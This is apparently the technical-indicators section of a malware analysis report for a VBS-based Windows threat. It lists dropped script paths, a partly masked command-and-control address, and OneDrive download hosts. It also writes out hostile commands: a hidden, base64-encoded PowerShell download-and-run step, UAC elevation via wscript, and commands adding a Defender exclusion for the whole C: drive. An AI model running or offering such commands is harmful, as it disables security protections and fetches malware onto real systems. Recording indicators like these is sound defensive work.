Technical information
- User Account Control (UAC)
- $asxzdbjdfdfdf.replace(}}}} as /
- %LOCALAPPDATA%\tempravendefender.vbs
- %LOCALAPPDATA%\tempdisable.vbs
- '10#.#12.180.189':5556
- 'on####ve.live.com':443
- 'ze####.#m.files.1drv.com':443
- DNS ASK on####ve.live.com
- DNS ASK ze####.#m.files.1drv.com
- '%WINDIR%\syswow64\wscript.exe' "%LOCALAPPDATA%\TempRavendefender.vbs"
- '%WINDIR%\syswow64\wscript.exe' "%LOCALAPPDATA%\TempDisable.vbs"
- '%WINDIR%\syswow64\wscript.exe' "%LOCALAPPDATA%\TempRavendefender.vbs" /elevate
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -enc JABBAFMAWABaAGQAYgBqAGQAZgBkAGYAZABmACAAPQAgAEAAJwANAAoAaAB0AHQAcABzADoALwAvAG8AbgBlAGQAcgBpAHYAZQAuAGwAaQB2AGUALgBjAG8AbQAvAEQAbwB3AG4AbABvAGEAZAA/AGMAaQBkAD0AMwAyADQAQQAzADQANQBF...' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit Add-MpPreference -ExclusionPath C:\' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit Add-MpPreference -ExclusionPath C:\